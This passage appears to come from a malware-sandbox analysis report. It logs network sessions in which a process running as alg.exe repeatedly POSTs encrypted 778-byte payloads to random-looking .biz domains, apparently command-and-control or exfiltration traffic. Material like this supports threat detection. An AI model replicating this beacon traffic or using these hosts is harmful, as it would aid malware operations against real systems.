                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.4 | 49857 | 3.94.10.34 | 80 | 6732 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:38:14.039732933 CET | 351 | OUT | POST /jfrndo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gvijgjwkh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:38:14.039758921 CET | 778 | OUT | Data Raw: ad fd 03 43 fc 11 06 ba fe 02 00 00 e2 44 de 03 10 c2 e4 ca 00 c3 24 fb 69 93 51 b3 e7 73 52 44 15 e5 4d 98 6a 61 45 7a 99 05 01 7a f6 a3 59 85 d7 c7 55 78 ad a5 72 76 8a cf c3 7d 0a 39 58 2e 02 f2 10 ad 62 69 c6 01 23 59 23 f2 5b 7a 8f e0 8e 0a
Data Ascii: CD$iQsRDMjaEzzYUxrv}9X.bi#Y#[z$lS ~qf6f|hK=QPo.H]_}bz)RF0^9fpe_qV)s4Wf?1Z!!D,eGq0aSzSP`meW
Oct 28, 2024 16:38:14.703419924 CET | 417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:38:14 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5799b860584bcda4c9b80f165e3dcbc5|155.94.241.188|1730129894|1730129894|0|1|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.4 | 49866 | 18.246.231.120 | 80 | 6732 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:38:15.069752932 CET | 353 | OUT | POST /akhgyldyrj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qpnczch.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 28, 2024 16:38:15.069777966 CET | 778 | OUT | Data Raw: 1f eb 89 5f c2 16 10 f0 fe 02 00 00 61 6b 5c 3d 06 b7 cd 9b 6f c0 b9 8a 11 1e d3 7f 19 2a 79 58 49 22 cc 8b 29 bd 62 a5 ab dc 38 ba d6 e6 34 d4 48 d5 59 01 a2 5d 8f 25 e6 b5 f7 b2 8c 0a 49 14 b5 f1 f2 f3 66 11 e3 79 77 21 e4 a8 b4 a2 9b 44 84 41
Data Ascii: _ak\=o*yXI")b84HY]%Ifyw!DARO7W}/YmQe*SXs|`t.iPkJOnzFEN@{\4M7JBLT\bBx)i@qnHd(0s7~Z'
Oct 28, 2024 16:38:15.892615080 CET | 415 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:38:15 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=d82852d64ec3fe7762c357a888509f7c|155.94.241.188|1730129895|1730129895|0|1|0; path=/; domain=.qpnczch.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        49192.168.2.4498733.254.94.185806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:16.102674961 CET347OUTPOST /wrdfsv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: brsua.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:16.102737904 CET778OUTData Raw: 92 da 0e 7a 88 1b 1a 26 fe 02 00 00 f1 ac a2 a5 be 6c 5d eb 0d 52 28 7c 6a da e7 09 e9 37 0d f9 cc d1 bb ce de 48 ad fc a7 60 d7 1b 14 8b 09 3c e2 55 fe a2 6f 1b e8 ef 8f 0c 54 7d 64 4c 7e 41 ec b6 1d 50 7c 48 1a e4 70 b5 8c c0 d5 77 2e 5d 35 a5
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: z&l]R(|j7H`<UoT}dL~AP|Hpw.]5c_}jksB;8TuQH)xJ^#m&&y,W(>HK]rvxpMo"&0OI}d5aJXR3+re,WHW${
Oct 28, 2024 16:38:17.058840036 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:16 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=45068329dc5ebc2a597ef5395216a55e|155.94.241.188|1730129896|1730129896|0|1|0; path=/; domain=.brsua.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.4 | 49881 | 85.214.228.140 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:38:17.865041971 CET | 349 | OUT | POST /eoefw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:38:17.865092993 CET | 778 | OUT | Data Raw: 30 fd 07 49 4c 1a 9e fb fe 02 00 00 18 09 96 fa a1 1e b6 20 eb 0b 83 c5 03 77 3c 28 8c dc 5f 5b 35 b5 60 dd c5 5d 13 87 50 e3 d6 7f 8a 07 7b d9 9a a4 44 1a 2c 8f 85 cf 90 6b 4d 72 7d 7e b6 3f 5b 21 e4 2e 11 85 cd 84 50 1e 80 ff 3c 40 aa 24 d6 51
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0IL w<(_[5`]P{D,kMr}~?[!.P<@$Q($2h -V 4k-0-34!oX"cN0`Km{h.Q*&*nR=}?s9v_/XR-S$OYtPTs,s;
Oct 28, 2024 16:38:18.749891043 CET | 161 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.27.2
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:18 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=20
Oct 28, 2024 16:38:18.750019073 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.4 | 49889 | 47.129.31.212 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:38:18.973161936 CET | 349 | OUT | POST /mhxqli HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: oflybfv.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:38:18.973196983 CET | 778 | OUT | Data Raw: 9e 8a 83 8f f6 d3 f5 93 fe 02 00 00 fa b2 02 9b 2b e2 64 96 58 fe b2 e1 41 ee 70 c1 5e 47 01 6e 95 54 22 72 72 64 24 57 44 98 20 44 6f c8 47 e3 57 02 12 2d 20 60 e8 10 de 20 a9 7e 50 88 5a ad 3a 91 f9 6a 91 15 c0 4e ce 11 4b fe b0 70 ea 52 e4 2f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: +dXAp^GnT"rrd$WD DoGW- ` ~PZ:jNKpR/-\ -5/_|xOS&j%{USNt'.3,_~H*Pc#ew,P<|<}s;{|o67B@dE4*_u`6:zVE
Oct 28, 2024 16:38:20.549344063 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:20 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=61967127a8b6d6d7f65dfcc5856ae5f6|155.94.241.188|1730129900|1730129900|0|1|0; path=/; domain=.oflybfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.4 | 49898 | 34.211.97.45 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:38:20.600442886 CET | 349 | OUT | POST /boadhtoh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: yhqqc.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:38:20.600442886 CET | 778 | OUT | Data Raw: 58 ba 22 33 55 5b b9 3d fe 02 00 00 57 bf 5b bd cd 89 d1 3b f7 2f 41 11 87 55 1d ef d0 14 26 f5 fd 1f 5e cb 32 b6 61 48 17 82 9d 65 b8 a1 3f ee 97 b9 2f 21 2d 8c 27 bb af da 2a c3 c6 6a 60 00 92 c1 4d 0e 73 df 9c 12 6e 82 d3 89 cc 5f 88 74 75 90
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: X"3U[=W[;/AU&^2aHe?/!-'*j`Msn_tur|q%GEs&*.+IIV^XVn!JC>mLh$j72]xQc##d%Dq/nfT"2a}V|wxIJHzHJ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.4 | 49904 | 34.211.97.45 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:38:21.369923115 CET | 348 | OUT | POST /aonsotl HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: yhqqc.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:38:21.369949102 CET | 778 | OUT | Data Raw: 66 64 aa 05 9e 42 bb 13 fe 02 00 00 80 f8 d2 55 5b 70 2b 81 76 8b 59 7e 78 66 6e ef 64 c4 80 ed fb e2 36 a2 96 5e 94 f1 7c bd c3 6d 8f 25 dc e8 9c c1 ff f8 63 56 29 bb a5 77 48 04 0b 47 10 ed f6 f0 33 fe 9b 11 ba 63 79 d3 2c 89 d1 36 7d 96 b2 52
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: fdBU[p+vY~xfnd6^|m%cV)wHG3cy,6}R8cJijsS]d:f[[.s Sj*>%QV"a_3Nml.xR>svA(o=+MvQm(#c|YoJ"n/&AN:[h};
Oct 28, 2024 16:38:22.198882103 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:22 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=0eca0b912da7c4ff33a1214f49e9b5dc|155.94.241.188|1730129902|1730129902|0|1|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.4 | 49909 | 47.129.31.212 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:38:22.230040073 CET | 357 | OUT | POST /ejfywbwbdmnosnl HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: mnjmhp.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:38:22.230063915 CET | 778 | OUT | Data Raw: 8f 1c d8 ad 83 b2 fe bd fe 02 00 00 63 98 32 4b 20 6a cf 3d 68 96 e4 cb 75 dc b8 3c 11 e2 96 34 56 d1 60 3d fa 2e e1 ce 40 46 73 c2 ec 38 fc 03 17 4c 31 6a 06 c8 38 46 0e c0 27 89 75 c3 a4 b9 3b 26 a2 28 56 e1 93 44 81 aa 88 a2 fe 17 fc 60 00 83
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: c2K j=hu<4V`=.@Fs8L1j8F'u;&(VD`/kHS1-E|+'a*zrgx![~X@-k*fzdb9Gs@'@X0*Ees5ngUB)Y*y3fu[JWBFou
Oct 28, 2024 16:38:23.677093983 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:23 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=3100dba8f70b56e9d6cb29db789ec204|155.94.241.188|1730129903|1730129903|0|1|0; path=/; domain=.mnjmhp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.4 | 49917 | 18.208.156.248 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:38:23.817389011 CET | 357 | OUT | POST /inujhuaraisu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: opowhhece.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:38:23.817421913 CET | 778 | OUT | Data Raw: fc 5c 14 51 a1 09 77 30 fe 02 00 00 10 22 42 e6 17 f1 51 46 6b 3b 5f 35 af 38 c7 bf 5a c9 f2 af 00 16 75 c3 e8 1a 57 31 94 b8 d1 ba e1 51 ac 5b 89 92 7e ae d5 8d 78 f2 0e b5 52 06 9a 0c 90 f7 b9 ed 83 14 e6 e0 aa 1d 08 6d 16 96 f3 3d 01 c9 48 e5
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: \Qw0"BQFk;_58ZuW1Q[~xRm=HMLTCv~hm?tLvg^7PCa?.UN/tgvBr!(N/W2yjZOLfCn9TaHQ]9w@iufH.&,bo}1vGR
Oct 28, 2024 16:38:24.474181890 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=39b0ad0a1458b3ac915384dc59499348|155.94.241.188|1730129904|1730129904|0|1|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.4 | 49921 | 13.251.16.150 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:38:24.507339954 CET | 354 | OUT | POST /ahomqbxdjyyc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: jdhhbs.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Oct 28, 2024 16:38:24.507339954 CET | 778 | OUT | Data Raw: 3f e5 21 4d db ef ad f8 fe 02 00 00 a0 12 b9 32 17 77 e4 4e c3 4a 57 7b 5f 2a 1a 7e d1 78 ec 7e 7e a3 9e 50 65 e8 2c 52 84 a5 d2 09 ea 13 a2 90 54 52 02 03 2d 0f ca 27 96 a0 b7 98 86 20 a7 92 15 70 92 d1 61 24 fa b2 8d 8b 7a 0f 23 45 2b 6f 17 83
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ?!M2wNJW{_*~x~~Pe,RTR-' pa$z#E+o8(#^k}IO]c,E<.Rz5uX3LxKtN*>aop\+`i31[F:DCVxh>BWalL, y="z{a


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.4 | 49926 | 13.251.16.150 | 80 | 6732 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 16:38:25.351178885 CET | 354 | OUT | POST /fcekfjqtslvl HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: jdhhbs.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:25.351222038 CET778OUTData Raw: 4b 77 a7 ea dd 43 02 e5 fe 02 00 00 0e de e1 99 3c 70 38 98 e1 fe 6c 3e b1 c6 38 87 ee d9 db 81 0c b2 05 a2 10 c2 c5 06 aa 25 a9 a0 93 69 15 6c d3 c0 83 e8 01 d0 45 7b 91 4f 05 7a ce b6 e8 9c eb e7 8b 9d fe 30 db 2b e9 55 47 d7 26 cc 62 39 51 2f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: KwC<p8l>8%ilE{Oz0+UG&b9Q/NctlpQevG]>@GWV`iB{g*x:~scN4&cYw=/b^a@;J1s\1*Yp4K*>MgI%'M,-#;xn|t4f,vL'5Re
Oct 28, 2024 16:38:26.774348021 CET  414                IN         HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:38:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=f81aca2393830fd186d4ee7fcdd25057|155.94.241.188|1730129906|1730129906|0|1|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
58          192.168.2.4  49935        34.246.200.160  80                6732  C:\Windows\System32\alg.exe

Timestamp                            Bytes transferred  Direction  Data
Oct 28, 2024 16:38:26.799005985 CET  349                OUT        POST /ltqh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: mgmsclkyu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:26.799040079 CET778OUTData Raw: a3 48 0e 0f c3 70 3a d8 fe 02 00 00 92 ff 41 95 29 4b 5b f3 8c 3e a2 88 39 c1 f1 77 c6 a4 49 da db c1 a1 8e 50 8c a4 74 4a a8 90 5f 5f a6 08 1d 41 a6 ea 91 68 5b 19 cd 01 28 40 e1 ca e2 5b 63 a0 d2 50 3c 18 20 cb 12 50 42 73 fb d9 a6 11 48 ae a2
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Hp:A)K[>9wIPtJ__Ah[(@[cP< PBsH8j#8rjG@v|Es,9dD{td//V6+D^K1I`=.Y9P'pQ#!{M'9W^g#|c
Oct 28, 2024 16:38:27.774780989 CET  417                IN         HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:38:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=40c6e01c56e9e92acf8728a9a86c1506|155.94.241.188|1730129907|1730129907|0|1|0; path=/; domain=.mgmsclkyu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
59          192.168.2.4  49941        18.141.10.107   80                6732  C:\Windows\System32\alg.exe

Timestamp                            Bytes transferred  Direction  Data
Oct 28, 2024 16:38:27.795793056 CET  357                OUT        POST /pmpevwipwdmvqi HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: warkcdu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:27.795804977 CET778OUTData Raw: ad a9 8e 40 37 9e 36 f7 fe 02 00 00 5a fb e5 a2 3b 2a 4a 6a 5b 98 f2 91 d1 55 78 dc 1d 15 6b b7 2a 60 eb 04 26 00 c0 6c 4f 4e 4d e9 76 b9 5f 6f 72 86 c3 18 49 80 12 ed 3e f7 fc b7 c8 f2 d1 66 90 49 1f 86 c1 4d 7f ed 9c de 7d aa 0f 34 14 87 d8 b2
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: @76Z;*Jj[Uxk*`&lONMv_orI>fIM}4A_l g4RA#m]75,9Q?<;7zc_=J)r`.tH%DLnJV,-%K>BGG,FU>Y9dJccIkqhGg\Y
Oct 28, 2024 16:38:29.232007980 CET  415                IN         HTTP/1.1 200 OK
Server: nginx
Date: Mon, 28 Oct 2024 15:38:28 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
